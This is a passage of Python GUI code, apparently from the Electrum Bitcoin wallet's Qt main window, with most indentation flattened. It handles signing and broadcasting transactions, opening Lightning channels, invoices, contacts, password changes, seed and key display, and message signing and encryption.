self.show_message(_('Not Enough Funds'))
return
cancelled, is_send, password, tx = d.run()
if cancelled:
return
if is_send:
def sign_done(success):
if success:
self.broadcast_or_show(tx)
self.sign_tx_with_password(tx, callback=sign_done, password=password,
external_keypairs=external_keypairs)
else:
self.preview_tx_dialog(make_tx=make_tx,
external_keypairs=external_keypairs)
def preview_tx_dialog(self, *, make_tx, external_keypairs=None):
d = PreviewTxDialog(make_tx=make_tx, external_keypairs=external_keypairs,
window=self)
d.show()
def broadcast_or_show(self, tx: Transaction):
if not tx.is_complete():
self.show_transaction(tx)
return
if not self.network:
self.show_error(_("You can't broadcast a transaction without a live network connection."))
self.show_transaction(tx)
return
self.broadcast_transaction(tx)
@protected
def sign_tx(self, tx, *, callback, external_keypairs, password):
self.sign_tx_with_password(tx, callback=callback, password=password, external_keypairs=external_keypairs)
def sign_tx_with_password(self, tx: PartialTransaction, *, callback, password, external_keypairs=None):
'''Sign the transaction in a separate thread. When done, calls
the callback with a success code of True or False.
'''
def on_success(result):
callback(True)
def on_failure(exc_info):
self.on_error(exc_info)
callback(False)
on_success = run_hook('tc_sign_wrapper', self.wallet, tx, on_success, on_failure) or on_success
if external_keypairs:
# can sign directly
task = partial(tx.sign, external_keypairs)
else:
task = partial(self.wallet.sign_transaction, tx, password)
msg = _('Signing transaction...')
WaitingDialog(self, msg, task, on_success, on_failure)
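    # Minimal callback sketch (same shape as pay_onchain_dialog above):
    #
    #     def sign_done(success):
    #         if success:
    #             self.broadcast_or_show(tx)
    #     self.sign_tx_with_password(tx, callback=sign_done, password=password)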
def broadcast_transaction(self, tx: Transaction):
def broadcast_thread():
# non-GUI thread
pr = self.payment_request
if pr and pr.has_expired():
self.payment_request = None
return False, _("Invoice has expired")
try:
self.network.run_from_another_thread(self.network.broadcast_transaction(tx))
except TxBroadcastError as e:
return False, e.get_message_for_gui()
except BestEffortRequestFailed as e:
return False, repr(e)
# success
txid = tx.txid()
if pr:
self.payment_request = None
refund_address = self.wallet.get_receiving_address()
coro = pr.send_payment_and_receive_paymentack(tx.serialize(), refund_address)
fut = asyncio.run_coroutine_threadsafe(coro, self.network.asyncio_loop)
ack_status, ack_msg = fut.result(timeout=20)
self.logger.info(f"Payment ACK: {ack_status}. Ack message: {ack_msg}")
return True, txid
# Capture current TL window; override might be removed on return
parent = self.top_level_window(lambda win: isinstance(win, MessageBoxMixin))
def broadcast_done(result):
# GUI thread
if result:
success, msg = result
if success:
parent.show_message(_('Payment sent.') + '\n' + msg)
self.invoice_list.update()
else:
msg = msg or ''
parent.show_error(msg)
WaitingDialog(self, _('Broadcasting transaction...'),
broadcast_thread, broadcast_done, self.on_error)
def mktx_for_open_channel(self, funding_sat):
coins = self.get_coins(nonlocal_only=True)
make_tx = lambda fee_est: self.wallet.lnworker.mktx_for_open_channel(coins=coins,
funding_sat=funding_sat,
fee_est=fee_est)
return make_tx
def open_channel(self, connect_str, funding_sat, push_amt):
# use ConfirmTxDialog
# we need to know the fee before we broadcast, because the txid is required
make_tx = self.mktx_for_open_channel(funding_sat)
d = ConfirmTxDialog(window=self, make_tx=make_tx, output_value=funding_sat, is_sweep=False)
        # disable the preview button: the user must not broadcast the funding tx
        # before the channel-establishment flow has completed
d.preview_button.setEnabled(False)
cancelled, is_send, password, funding_tx = d.run()
if not is_send:
return
if cancelled:
return
# read funding_sat from tx; converts '!' to int value
funding_sat = funding_tx.output_value_for_address(ln_dummy_address())
def task():
return self.wallet.lnworker.open_channel(connect_str=connect_str,
funding_tx=funding_tx,
funding_sat=funding_sat,
push_amt_sat=push_amt,
password=password)
def on_success(args):
chan, funding_tx = args
n = chan.constraints.funding_txn_minimum_depth
message = '\n'.join([
_('Channel established.'),
_('Remote peer ID') + ':' + chan.node_id.hex(),
_('This channel will be usable after {} confirmations').format(n)
])
if not funding_tx.is_complete():
message += '\n\n' + _('Please sign and broadcast the funding transaction')
self.show_message(message)
if not funding_tx.is_complete():
self.show_transaction(funding_tx)
def on_failure(exc_info):
type_, e, traceback = exc_info
self.show_error(_('Could not open channel: {}').format(repr(e)))
WaitingDialog(self, _('Opening channel...'), task, on_success, on_failure)
def query_choice(self, msg, choices):
# Needed by QtHandler for hardware wallets
dialog = WindowModalDialog(self.top_level_window())
clayout = ChoicesLayout(msg, choices)
vbox = QVBoxLayout(dialog)
vbox.addLayout(clayout.layout())
vbox.addLayout(Buttons(OkButton(dialog)))
if not dialog.exec_():
return None
return clayout.selected_index()
def lock_amount(self, b: bool) -> None:
self.amount_e.setFrozen(b)
self.max_button.setEnabled(not b)
def prepare_for_payment_request(self):
self.show_send_tab()
self.payto_e.is_pr = True
for e in [self.payto_e, self.message_e]:
e.setFrozen(True)
self.lock_amount(True)
self.payto_e.setText(_("please wait..."))
return True
def delete_invoices(self, keys):
for key in keys:
self.wallet.delete_invoice(key)
self.invoice_list.update()
def payment_request_ok(self):
pr = self.payment_request
if not pr:
return
key = pr.get_id()
invoice = self.wallet.get_invoice(key)
if invoice and self.wallet.get_invoice_status(invoice) == PR_PAID:
self.show_message("invoice already paid")
self.do_clear()
self.payment_request = None
return
self.payto_e.is_pr = True
if not pr.has_expired():
self.payto_e.setGreen()
else:
self.payto_e.setExpired()
self.payto_e.setText(pr.get_requestor())
self.amount_e.setAmount(pr.get_amount())
self.message_e.setText(pr.get_memo())
# signal to set fee
self.amount_e.textEdited.emit("")
def payment_request_error(self):
pr = self.payment_request
if not pr:
return
self.show_message(pr.error)
self.payment_request = None
self.do_clear()
def on_pr(self, request: 'paymentrequest.PaymentRequest'):
self.set_onchain(True)
self.payment_request = request
if self.payment_request.verify(self.contacts):
self.payment_request_ok_signal.emit()
else:
self.payment_request_error_signal.emit()
def parse_lightning_invoice(self, invoice):
"""Parse ln invoice, and prepare the send tab for it."""
try:
lnaddr = lndecode(invoice, expected_hrp=constants.net.SEGWIT_HRP)
except Exception as e:
raise LnDecodeException(e) from e
pubkey = bh2u(lnaddr.pubkey.serialize())
for k,v in lnaddr.tags:
if k == 'd':
description = v
break
else:
description = ''
self.payto_e.setFrozen(True)
self.payto_e.setText(pubkey)
self.message_e.setText(description)
if lnaddr.amount is not None:
self.amount_e.setAmount(lnaddr.amount * COIN)
#self.amount_e.textEdited.emit("")
self.set_onchain(False)
def set_onchain(self, b):
self._is_onchain = b
self.max_button.setEnabled(b)
def pay_to_URI(self, URI):
if not URI:
return
try:
out = util.parse_URI(URI, self.on_pr)
except InvalidBitcoinURI as e:
self.show_error(_("Error parsing URI") + f":\n{e}")
return
self.show_send_tab()
self.payto_URI = out
r = out.get('r')
sig = out.get('sig')
name = out.get('name')
if r or (name and sig):
self.prepare_for_payment_request()
return
address = out.get('address')
amount = out.get('amount')
label = out.get('label')
message = out.get('message')
# use label as description (not BIP21 compliant)
if label and not message:
message = label
if address:
self.payto_e.setText(address)
if message:
self.message_e.setText(message)
if amount:
self.amount_e.setAmount(amount)
self.amount_e.textEdited.emit("")
def do_clear(self):
self.max_button.setChecked(False)
self.payment_request = None
self.payto_URI = None
self.payto_e.is_pr = False
self.set_onchain(False)
for e in [self.payto_e, self.message_e, self.amount_e]:
e.setText('')
e.setFrozen(False)
self.update_status()
run_hook('do_clear', self)
def set_frozen_state_of_addresses(self, addrs, freeze: bool):
self.wallet.set_frozen_state_of_addresses(addrs, freeze)
self.address_list.update()
self.utxo_list.update()
def set_frozen_state_of_coins(self, utxos: Sequence[PartialTxInput], freeze: bool):
self.wallet.set_frozen_state_of_coins(utxos, freeze)
self.utxo_list.update()
def create_list_tab(self, l, toolbar=None):
w = QWidget()
w.searchable_list = l
vbox = QVBoxLayout()
w.setLayout(vbox)
#vbox.setContentsMargins(0, 0, 0, 0)
#vbox.setSpacing(0)
if toolbar:
vbox.addLayout(toolbar)
vbox.addWidget(l)
return w
def create_addresses_tab(self):
from .address_list import AddressList
self.address_list = l = AddressList(self)
toolbar = l.create_toolbar(self.config)
toolbar_shown = bool(self.config.get('show_toolbar_addresses', False))
l.show_toolbar(toolbar_shown)
return self.create_list_tab(l, toolbar)
def create_utxo_tab(self):
from .utxo_list import UTXOList
self.utxo_list = UTXOList(self)
return self.create_list_tab(self.utxo_list)
def create_contacts_tab(self):
from .contact_list import ContactList
self.contact_list = l = ContactList(self)
return self.create_list_tab(l)
def remove_address(self, addr):
if self.question(_("Do you want to remove {} from your wallet?").format(addr)):
self.wallet.delete_address(addr)
self.need_update.set() # history, addresses, coins
self.clear_receive_tab()
def paytomany(self):
self.show_send_tab()
self.payto_e.paytomany()
msg = '\n'.join([
_('Enter a list of outputs in the \'Pay to\' field.'),
_('One output per line.'),
_('Format: address, amount'),
_('You may load a CSV file using the file icon.')
])
self.show_message(msg, title=_('Pay to many'))
def payto_contacts(self, labels):
paytos = [self.get_contact_payto(label) for label in labels]
self.show_send_tab()
if len(paytos) == 1:
self.payto_e.setText(paytos[0])
self.amount_e.setFocus()
else:
text = "\n".join([payto + ", 0" for payto in paytos])
self.payto_e.setText(text)
self.payto_e.setFocus()
def set_contact(self, label, address):
if not is_address(address):
self.show_error(_('Invalid Address'))
self.contact_list.update() # Displays original unchanged value
return False
self.contacts[address] = ('address', label)
self.contact_list.update()
self.history_list.update()
self.update_completions()
return True
def delete_contacts(self, labels):
if not self.question(_("Remove {} from your list of contacts?")
.format(" + ".join(labels))):
return
for label in labels:
self.contacts.pop(label)
self.history_list.update()
self.contact_list.update()
self.update_completions()
def show_onchain_invoice(self, invoice: OnchainInvoice):
amount_str = self.format_amount(invoice.amount) + ' ' + self.base_unit()
d = WindowModalDialog(self, _("Onchain Invoice"))
vbox = QVBoxLayout(d)
grid = QGridLayout()
grid.addWidget(QLabel(_("Amount") + ':'), 1, 0)
grid.addWidget(QLabel(amount_str), 1, 1)
if len(invoice.outputs) == 1:
grid.addWidget(QLabel(_("Address") + ':'), 2, 0)
grid.addWidget(QLabel(invoice.get_address()), 2, 1)
else:
outputs_str = '\n'.join(f"{x.address} : {self.format_amount(x.value)} {self.base_unit()}" for x in invoice.outputs)
grid.addWidget(QLabel(_("Outputs") + ':'), 2, 0)
grid.addWidget(QLabel(outputs_str), 2, 1)
grid.addWidget(QLabel(_("Description") + ':'), 3, 0)
grid.addWidget(QLabel(invoice.message), 3, 1)
if invoice.exp:
grid.addWidget(QLabel(_("Expires") + ':'), 4, 0)
grid.addWidget(QLabel(format_time(invoice.exp + invoice.time)), 4, 1)
if invoice.bip70:
pr = paymentrequest.PaymentRequest(bytes.fromhex(invoice.bip70))
pr.verify(self.contacts)
grid.addWidget(QLabel(_("Requestor") + ':'), 5, 0)
grid.addWidget(QLabel(pr.get_requestor()), 5, 1)
grid.addWidget(QLabel(_("Signature") + ':'), 6, 0)
grid.addWidget(QLabel(pr.get_verify_status()), 6, 1)
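# Let the user save the raw BIP70 payment request to a .bip70 file.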
def do_export():
key = pr.get_id()
name = str(key) + '.bip70'
fn = self.getSaveFileName(_("Save invoice to file"), name, filter="*.bip70")
if not fn:
return
with open(fn, 'wb') as f:
f.write(pr.raw)
self.show_message(_('BIP70 invoice saved as') + ' ' + fn)
exportButton = EnterButton(_('Export'), do_export)
buttons = Buttons(exportButton, CloseButton(d))
else:
buttons = Buttons(CloseButton(d))
vbox.addLayout(grid)
vbox.addLayout(buttons)
d.exec_()
def show_lightning_invoice(self, invoice: LNInvoice):
lnaddr = lndecode(invoice.invoice, expected_hrp=constants.net.SEGWIT_HRP)
d = WindowModalDialog(self, _("Lightning Invoice"))
vbox = QVBoxLayout(d)
grid = QGridLayout()
grid.addWidget(QLabel(_("Node ID") + ':'), 0, 0)
grid.addWidget(QLabel(lnaddr.pubkey.serialize().hex()), 0, 1)
grid.addWidget(QLabel(_("Amount") + ':'), 1, 0)
amount_str = self.format_amount(invoice.amount) + ' ' + self.base_unit()
grid.addWidget(QLabel(amount_str), 1, 1)
grid.addWidget(QLabel(_("Description") + ':'), 2, 0)
grid.addWidget(QLabel(invoice.message), 2, 1)
grid.addWidget(QLabel(_("Hash") + ':'), 3, 0)
grid.addWidget(QLabel(lnaddr.paymenthash.hex()), 3, 1)
if invoice.exp:
grid.addWidget(QLabel(_("Expires") + ':'), 4, 0)
grid.addWidget(QLabel(format_time(invoice.time + invoice.exp)), 4, 1)
vbox.addLayout(grid)
invoice_e = ShowQRTextEdit()
invoice_e.addCopyButton(self.app)
invoice_e.setText(invoice.invoice)
vbox.addWidget(invoice_e)
vbox.addLayout(Buttons(CloseButton(d),))
d.exec_()
def create_console_tab(self):
from .console import Console
self.console = console = Console()
return console
def update_console(self):
console = self.console
console.history = self.wallet.db.get("qt-console-history", [])
console.history_index = len(console.history)
console.updateNamespace({
'wallet': self.wallet,
'network': self.network,
'plugins': self.gui_object.plugins,
'window': self,
'config': self.config,
'electrum': electrum,
'daemon': self.gui_object.daemon,
'util': util,
'bitcoin': bitcoin,
})
c = commands.Commands(config=self.config,
network=self.network,
callback=lambda: self.console.set_json(True))
methods = {}
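# Expose Commands methods in the console, binding the password prompt and the current wallet to each call.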
def mkfunc(f, method):
return lambda *args, **kwargs: f(method,
args,
self.password_dialog,
**{**kwargs, 'wallet': self.wallet})
for m in dir(c):
if m[0]=='_' or m in ['network','wallet','config']: continue
methods[m] = mkfunc(c._run, m)
console.updateNamespace(methods)
def create_status_bar(self):
sb = QStatusBar()
sb.setFixedHeight(35)
self.balance_label = QLabel("Loading wallet...")
self.balance_label.setTextInteractionFlags(Qt.TextSelectableByMouse)
self.balance_label.setStyleSheet("""QLabel { padding: 0 }""")
sb.addWidget(self.balance_label)
self.search_box = QLineEdit()
self.search_box.textChanged.connect(self.do_search)
self.search_box.hide()
sb.addPermanentWidget(self.search_box)
self.update_check_button = QPushButton("")
self.update_check_button.setFlat(True)
self.update_check_button.setCursor(QCursor(Qt.PointingHandCursor))
self.update_check_button.setIcon(read_QIcon("update.png"))
self.update_check_button.hide()
sb.addPermanentWidget(self.update_check_button)
self.password_button = StatusBarButton(QIcon(), _("Password"), self.change_password_dialog )
sb.addPermanentWidget(self.password_button)
sb.addPermanentWidget(StatusBarButton(read_QIcon("preferences.png"), _("Preferences"), self.settings_dialog ) )
self.seed_button = StatusBarButton(read_QIcon("seed.png"), _("Seed"), self.show_seed_dialog )
sb.addPermanentWidget(self.seed_button)
self.lightning_button = None
if self.wallet.has_lightning() and self.network:
self.lightning_button = StatusBarButton(read_QIcon("lightning.png"), _("Lightning Network"), self.gui_object.show_lightning_dialog)
self.update_lightning_icon()
sb.addPermanentWidget(self.lightning_button)
self.status_button = None
if self.network:
self.status_button = StatusBarButton(read_QIcon("status_disconnected.png"), _("Network"), self.gui_object.show_network_dialog)
sb.addPermanentWidget(self.status_button)
run_hook('create_status_bar', sb)
self.setStatusBar(sb)
def create_coincontrol_statusbar(self):
self.coincontrol_sb = sb = QStatusBar()
sb.setSizeGripEnabled(False)
#sb.setFixedHeight(3 * char_width_in_lineedit())
sb.setStyleSheet('QStatusBar::item {border: None;} '
+ ColorScheme.GREEN.as_stylesheet(True))
self.coincontrol_label = QLabel()
self.coincontrol_label.setSizePolicy(QSizePolicy.Preferred, QSizePolicy.Preferred)
self.coincontrol_label.setTextInteractionFlags(Qt.TextSelectableByMouse)
sb.addWidget(self.coincontrol_label)
clear_cc_button = EnterButton(_('Reset'), lambda: self.utxo_list.set_spend_list(None))
clear_cc_button.setStyleSheet("margin-right: 5px;")
sb.addPermanentWidget(clear_cc_button)
sb.setVisible(False)
return sb
def set_coincontrol_msg(self, msg: Optional[str]) -> None:
if not msg:
self.coincontrol_label.setText("")
self.coincontrol_sb.setVisible(False)
return
self.coincontrol_label.setText(msg)
self.coincontrol_sb.setVisible(True)
def update_lightning_icon(self):
if self.lightning_button is None:
return
if not self.network.is_lightning_running():
return
cur, total = self.network.lngossip.get_sync_progress_estimate()
# self.logger.debug(f"updating lngossip sync progress estimate: cur={cur}, total={total}")
progress_percent = 0
progress_str = "??%"
if cur is not None and total is not None and total > 0:
# note: Progress is rescaled such that 95% is considered "done".
# "Real" progress can stay around 98-99% for a long time, which
# might needlessly worry users.
progress_percent = (1.0 / 0.95 * cur / total) * 100
progress_percent = min(progress_percent, 100)
progress_percent = round(progress_percent)
progress_str = f"{progress_percent}%"
if progress_percent >= 100:
self.lightning_button.setMaximumWidth(25)
self.lightning_button.setText('')
self.lightning_button.setToolTip(_("The Lightning Network graph is fully synced."))
else:
self.lightning_button.setMaximumWidth(25 + 4 * char_width_in_lineedit())
self.lightning_button.setText(progress_str)
self.lightning_button.setToolTip(_("The Lightning Network graph is syncing...\n"
"Payments are more likely to succeed with a more complete graph."))
def update_lock_icon(self):
icon = read_QIcon("lock.png") if self.wallet.has_password() else read_QIcon("unlock.png")
self.password_button.setIcon(icon)
def update_buttons_on_seed(self):
self.seed_button.setVisible(self.wallet.has_seed())
self.password_button.setVisible(self.wallet.may_have_password())
def change_password_dialog(self):
from electrum.storage import StorageEncryptionVersion
if self.wallet.get_available_storage_encryption_version() == StorageEncryptionVersion.XPUB_PASSWORD:
from .password_dialog import ChangePasswordDialogForHW
d = ChangePasswordDialogForHW(self, self.wallet)
ok, encrypt_file = d.run()
if not ok:
return
try:
hw_dev_pw = self.wallet.keystore.get_password_for_storage_encryption()
except UserCancelled:
return
except BaseException as e:
self.logger.exception('')
self.show_error(repr(e))
return
old_password = hw_dev_pw if self.wallet.has_password() else None
new_password = hw_dev_pw if encrypt_file else None
else:
from .password_dialog import ChangePasswordDialogForSW
d = ChangePasswordDialogForSW(self, self.wallet)
ok, old_password, new_password, encrypt_file = d.run()
if not ok:
return
try:
self.wallet.update_password(old_password, new_password, encrypt_storage=encrypt_file)
except InvalidPassword as e:
self.show_error(str(e))
return
except BaseException:
self.logger.exception('Failed to update password')
self.show_error(_('Failed to update password'))
return
msg = _('Password was updated successfully') if self.wallet.has_password() else _('Password is disabled, this wallet is not protected')
self.show_message(msg, title=_("Success"))
self.update_lock_icon()
def toggle_search(self):
self.search_box.setHidden(not self.search_box.isHidden())
if not self.search_box.isHidden():
self.search_box.setFocus(1)
else:
self.do_search('')
def do_search(self, t):
tab = self.tabs.currentWidget()
if hasattr(tab, 'searchable_list'):
tab.searchable_list.filter(t)
def new_contact_dialog(self):
d = WindowModalDialog(self, _("New Contact"))
vbox = QVBoxLayout(d)
vbox.addWidget(QLabel(_('New Contact') + ':'))
grid = QGridLayout()
line1 = QLineEdit()
line1.setFixedWidth(32 * char_width_in_lineedit())
line2 = QLineEdit()
line2.setFixedWidth(32 * char_width_in_lineedit())
grid.addWidget(QLabel(_("Address")), 1, 0)
grid.addWidget(line1, 1, 1)
grid.addWidget(QLabel(_("Name")), 2, 0)
grid.addWidget(line2, 2, 1)
vbox.addLayout(grid)
vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
if d.exec_():
self.set_contact(line2.text(), line1.text())
def disable_lightning(self):
warning = _('This will delete your lightning private keys')
r = self.question(_('Disable Lightning payments?') + '\n\n' + warning)
if not r:
return
self.wallet.remove_lightning()
self.show_warning(_('Lightning keys have been removed. This wallet will be closed'))
self.close()
def enable_lightning(self):
warning1 = _("Lightning support in Electrum is experimental. Do not put large amounts in lightning channels.")
warning2 = _("Funds stored in lightning channels are not recoverable from your seed. You must backup your wallet file everytime you create a new channel.")
r = self.question(_('Enable Lightning payments?') + '\n\n' + _('WARNINGS') + ': ' + '\n\n' + warning1 + '\n\n' + warning2)
if not r:
return
self.wallet.init_lightning()
self.show_warning(_('Lightning keys have been initialized. This wallet will be closed'))
self.close()
def show_wallet_info(self):
dialog = WindowModalDialog(self, _("Wallet Information"))
dialog.setMinimumSize(500, 100)
mpk_list = self.wallet.get_master_public_keys()
vbox = QVBoxLayout()
wallet_type = self.wallet.db.get('wallet_type', '')
if self.wallet.is_watching_only():
wallet_type += ' [{}]'.format(_('watching-only'))
seed_available = _('True') if self.wallet.has_seed() else _('False')
keystore_types = [k.get_type_text() for k in self.wallet.get_keystores()]
grid = QGridLayout()
basename = os.path.basename(self.wallet.storage.path)
grid.addWidget(QLabel(_("Wallet name")+ ':'), 0, 0)
grid.addWidget(QLabel(basename), 0, 1)
grid.addWidget(QLabel(_("Wallet type")+ ':'), 1, 0)
grid.addWidget(QLabel(wallet_type), 1, 1)
grid.addWidget(QLabel(_("Script type")+ ':'), 2, 0)
grid.addWidget(QLabel(self.wallet.txin_type), 2, 1)
grid.addWidget(QLabel(_("Seed available") + ':'), 3, 0)
grid.addWidget(QLabel(str(seed_available)), 3, 1)
if len(keystore_types) <= 1:
grid.addWidget(QLabel(_("Keystore type") + ':'), 4, 0)
ks_type = str(keystore_types[0]) if keystore_types else _('No keystore')
grid.addWidget(QLabel(ks_type), 4, 1)
# lightning
grid.addWidget(QLabel(_('Lightning') + ':'), 5, 0)
if self.wallet.can_have_lightning():
if self.wallet.has_lightning():
lightning_b = QPushButton(_('Disable'))
lightning_b.clicked.connect(dialog.close)
lightning_b.clicked.connect(self.disable_lightning)
lightning_label = QLabel(_('Enabled'))
lightning_b.setDisabled(bool(self.wallet.lnworker.channels))
else:
lightning_b = QPushButton(_('Enable'))
lightning_b.clicked.connect(dialog.close)
lightning_b.clicked.connect(self.enable_lightning)
lightning_label = QLabel(_('Disabled'))
grid.addWidget(lightning_label, 5, 1)
grid.addWidget(lightning_b, 5, 2)
else:
grid.addWidget(QLabel(_("Not available for this wallet.")), 5, 1)
grid.addWidget(HelpButton(_("Lightning is currently restricted to HD wallets with p2wpkh addresses.")), 5, 2)
vbox.addLayout(grid)
labels_clayout = None
if self.wallet.is_deterministic():
mpk_text = ShowQRTextEdit()
mpk_text.setMaximumHeight(150)
mpk_text.addCopyButton(self.app)
def show_mpk(index):
mpk_text.setText(mpk_list[index])
mpk_text.repaint() # macOS hack for #4777
# only show the combobox in case multiple accounts are available
if len(mpk_list) > 1:
# only show the combobox if multiple master keys are defined
def label(idx, ks):
if isinstance(self.wallet, Multisig_Wallet) and hasattr(ks, 'label'):
return _("cosigner") + f' {idx+1}: {ks.get_type_text()} {ks.label}'
else:
return _("keystore") + f' {idx+1}'
labels = [label(idx, ks) for idx, ks in enumerate(self.wallet.get_keystores())]
on_click = lambda clayout: show_mpk(clayout.selected_index())
labels_clayout = ChoicesLayout(_("Master Public Keys"), labels, on_click)
vbox.addLayout(labels_clayout.layout())
labels_clayout.selected_index()
else:
vbox.addWidget(QLabel(_("Master Public Key")))
show_mpk(0)
vbox.addWidget(mpk_text)
vbox.addStretch(1)
btn_export_info = run_hook('wallet_info_buttons', self, dialog)
btn_show_xpub = run_hook('show_xpub_button', self, dialog, labels_clayout)
btn_close = CloseButton(dialog)
btns = Buttons(btn_export_info, btn_show_xpub, btn_close)
vbox.addLayout(btns)
dialog.setLayout(vbox)
dialog.exec_()
def remove_wallet(self):
if self.question('\n'.join([
_('Delete wallet file?'),
"%s"%self.wallet.storage.path,
_('If your wallet contains funds, make sure you have saved its seed.')])):
self._delete_wallet()
@protected
def _delete_wallet(self, password):
wallet_path = self.wallet.storage.path
basename = os.path.basename(wallet_path)
r = self.gui_object.daemon.delete_wallet(wallet_path)
self.close()
if r:
self.show_error(_("Wallet removed: {}").format(basename))
else:
self.show_error(_("Wallet file not found: {}").format(basename))
@protected
def show_seed_dialog(self, password):
if not self.wallet.has_seed():
self.show_message(_('This wallet has no seed'))
return
keystore = self.wallet.get_keystore()
try:
seed = keystore.get_seed(password)
passphrase = keystore.get_passphrase(password)
except BaseException as e:
self.show_error(repr(e))
return
from .seed_dialog import SeedDialog
d = SeedDialog(self, seed, passphrase)
d.exec_()
def show_qrcode(self, data, title = _("QR code"), parent=None):
if not data:
return
d = QRDialog(data, parent or self, title)
d.exec_()
@protected
def show_private_key(self, address, password):
if not address:
return
try:
pk = self.wallet.export_private_key(address, password)
except Exception as e:
self.logger.exception('')
self.show_message(repr(e))
return
xtype = bitcoin.deserialize_privkey(pk)[0]
d = WindowModalDialog(self, _("Private key"))
d.setMinimumSize(600, 150)
vbox = QVBoxLayout()
vbox.addWidget(QLabel(_("Address") + ': ' + address))
vbox.addWidget(QLabel(_("Script type") + ': ' + xtype))
vbox.addWidget(QLabel(_("Private key") + ':'))
keys_e = ShowQRTextEdit(text=pk)
keys_e.addCopyButton(self.app)
vbox.addWidget(keys_e)
# if redeem_script:
# vbox.addWidget(QLabel(_("Redeem Script") + ':'))
# rds_e = ShowQRTextEdit(text=redeem_script)
# rds_e.addCopyButton(self.app)
# vbox.addWidget(rds_e)
vbox.addLayout(Buttons(CloseButton(d)))
d.setLayout(vbox)
d.exec_()
msg_sign = _("Signing with an address actually means signing with the corresponding "
"private key, and verifying with the corresponding public key. The "
"address you have entered does not have a unique public key, so these "
"operations cannot be performed.") + '\n\n' + \
_('The operation is undefined. Not just in Electrum, but in general.')
@protected
def do_sign(self, address, message, signature, password):
address = address.text().strip()
message = message.toPlainText().strip()
if not bitcoin.is_address(address):
self.show_message(_('Invalid Bitcoin address.'))
return
if self.wallet.is_watching_only():
self.show_message(_('This is a watching-only wallet.'))
return
if not self.wallet.is_mine(address):
self.show_message(_('Address not in wallet.'))
return
txin_type = self.wallet.get_txin_type(address)
if txin_type not in ['p2pkh', 'p2wpkh', 'p2wpkh-p2sh']:
self.show_message(_('Cannot sign messages with this type of address:') + \
' ' + txin_type + '\n\n' + self.msg_sign)
return
task = partial(self.wallet.sign_message, address, message, password)
def show_signed_message(sig):
try:
signature.setText(base64.b64encode(sig).decode('ascii'))
except RuntimeError:
# (signature) wrapped C/C++ object has been deleted
pass
self.wallet.thread.add(task, on_success=show_signed_message)
def do_verify(self, address, message, signature):
address = address.text().strip()
message = message.toPlainText().strip().encode('utf-8')
if not bitcoin.is_address(address):
self.show_message(_('Invalid Bitcoin address.'))
return
try:
# This can throw on invalid base64
sig = base64.b64decode(str(signature.toPlainText()))
verified = ecc.verify_message_with_address(address, sig, message)
except Exception as e:
verified = False
if verified:
self.show_message(_("Signature verified"))
else:
self.show_error(_("Wrong signature"))
def sign_verify_message(self, address=''):
d = WindowModalDialog(self, _('Sign/verify Message'))
d.setMinimumSize(610, 290)
layout = QGridLayout(d)
message_e = QTextEdit()
message_e.setAcceptRichText(False)
layout.addWidget(QLabel(_('Message')), 1, 0)
layout.addWidget(message_e, 1, 1)
layout.setRowStretch(2,3)
address_e = QLineEdit()
address_e.setText(address)
layout.addWidget(QLabel(_('Address')), 2, 0)
layout.addWidget(address_e, 2, 1)
signature_e = QTextEdit()
signature_e.setAcceptRichText(False)
layout.addWidget(QLabel(_('Signature')), 3, 0)
layout.addWidget(signature_e, 3, 1)
layout.setRowStretch(3,1)
hbox = QHBoxLayout()
b = QPushButton(_("Sign"))
b.clicked.connect(lambda: self.do_sign(address_e, message_e, signature_e))
hbox.addWidget(b)
b = QPushButton(_("Verify"))
b.clicked.connect(lambda: self.do_verify(address_e, message_e, signature_e))
hbox.addWidget(b)
b = QPushButton(_("Close"))
b.clicked.connect(d.accept)
hbox.addWidget(b)
layout.addLayout(hbox, 4, 1)
d.exec_()
@protected
def do_decrypt(self, message_e, pubkey_e, encrypted_e, password):
if self.wallet.is_watching_only():
self.show_message(_('This is a watching-only wallet.'))
return
cyphertext = encrypted_e.toPlainText()
task = partial(self.wallet.decrypt_message, pubkey_e.text(), cyphertext, password)
def setText(text):
try:
message_e.setText(text.decode('utf-8'))
except RuntimeError:
# (message_e) wrapped C/C++ object has been deleted
pass
self.wallet.thread.add(task, on_success=setText)
def do_encrypt(self, message_e, pubkey_e, encrypted_e):
message = message_e.toPlainText()
message = message.encode('utf-8')
try:
public_key = ecc.ECPubkey(bfh(pubkey_e.text()))
except BaseException as e:
self.logger.exception('Invalid Public key')
self.show_warning(_('Invalid Public key'))
return
encrypted = public_key.encrypt_message(message)
encrypted_e.setText(encrypted.decode('ascii'))
def encrypt_message(self, address=''):
d = WindowModalDialog(self, _('Encrypt/decrypt Message'))
d.setMinimumSize(610, 490)
layout = QGridLayout(d)
message_e = QTextEdit()
message_e.setAcceptRichText(False)
layout.addWidget(QLabel(_('Message')), 1, 0)
layout.addWidget(message_e, 1, 1)
layout.setRowStretch(2,3)
pubkey_e = QLineEdit()
if address:
pubkey = self.wallet.get_public_key(address)
pubkey_e.setText(pubkey)
layout.addWidget(QLabel(_('Public key')), 2, 0)
layout.addWidget(pubkey_e, 2, 1)
encrypted_e = QTextEdit()
encrypted_e.setAcceptRichText(False)
layout.addWidget(QLabel(_('Encrypted')), 3, 0)
layout.addWidget(encrypted_e, 3, 1)
layout.setRowStretch(3,1)
hbox = QHBoxLayout()
b = QPushButton(_("Encrypt"))
b.clicked.connect(lambda: self.do_encrypt(message_e, pubkey_e, encrypted_e))
hbox.addWidget(b)
b = QPushButton(_("Decrypt"))
b.clicked.connect(lambda: self.do_decrypt(message_e, pubkey_e, encrypted_e))
hbox.addWidget(b)
b = QPushButton(_("Close"))
b.clicked.connect(d.accept)
hbox.addWidget(b)
layout.addLayout(hbox, 4, 1)
d.exec_()
def password_dialog(self, msg=None, parent=None):
from .password_dialog import PasswordDialog
parent = parent or self
d = PasswordDialog(parent, msg)
return d.run()
def tx_from_text(self, data: Union[str, bytes]) -> Union[None, 'PartialTransaction', 'Transaction']:
from electrum.transaction import tx_from_any
try:
return tx_from_any(data)
except BaseException as e:
self.show_critical(_("Electrum was unable to parse your transaction") + ":\n" + repr(e))
return
def import_channel_backup(self, encrypted):
if not self.question(_('Import channel backup?')):
return
try:
self.wallet.lnbackups.import_channel_backup(encrypted)
except Exception as e:
self.show_error("failed to import backup" + '\n' + str(e))
return
def read_tx_from_qrcode(self):
from electrum import qrscanner
try:
data = qrscanner.scan_barcode(self.config.get_video_device())
except BaseException as e:
self.show_error(repr(e))
return
if not data:
return
# if the user scanned a bitcoin URI
if str(data).startswith("bitcoin:"):
self.pay_to_URI(data)
return
if data.startswith('channel_backup:'):
